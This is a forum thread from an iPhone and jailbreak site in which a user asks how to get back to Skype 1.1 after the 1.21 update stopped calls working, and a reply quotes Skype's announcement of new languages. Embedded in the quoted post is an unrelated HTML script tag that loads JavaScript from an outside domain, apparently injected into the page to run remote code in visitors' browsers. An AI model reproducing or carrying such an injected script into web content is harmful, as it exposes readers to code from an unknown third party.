Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: Skype not working. How do i get Skype 1.1?

Default Skype not working. How do i get Skype 1.1?
    i made the unfortunate mistake of updating Skype to 1.21 without reading the comments to see if there were any problems with it. now i am without Skype. i keep getting the msg saying i need to be online when i try to make a call.

does anyone know where i can get Skype 1.1 and how to install it? or is there a work around for the latest Skype and jailbroken iPhones.

any help would be greatly appreciated!

Quote Originally Posted by suhreal View Post
    i made the unfortunate mistake of updating Skype to 1.21 without reading the comments to see if there were any problems with it. now i am without Skype. i keep getting the msg saying i need to be online when i try to make a call.

does anyone know where i can get Skype 1.1 and how to install it? or is there a work around for the latest Skype and jailbroken iPhones.

any help would be greatly appreciated!<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    Skype for iPhone speaks your language its now available in Danish, Dutch, Finnish, French, German, Italian, Japanese, Korean, Norwegian, Polish, Portuguese (Brazil), Portuguese (Portugal), Russian, Simplified Chinese, Spanish, Swedish and Traditional Chinese as well as English.

source:Skype 1.1 for iPhone and iPod touch out now - Skype Blogs